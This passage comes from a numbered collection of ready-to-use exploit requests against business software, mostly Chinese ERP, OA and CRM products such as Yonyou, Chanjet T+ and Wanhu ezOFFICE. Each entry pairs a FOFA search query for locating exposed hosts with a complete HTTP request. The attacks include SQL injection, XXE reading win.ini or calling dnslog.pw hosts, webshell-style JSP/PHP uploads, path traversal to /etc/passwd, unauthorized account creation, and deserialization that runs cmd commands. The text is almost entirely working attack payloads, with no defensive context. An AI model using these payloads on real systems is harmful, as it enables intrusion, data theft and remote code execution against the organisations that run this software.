FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
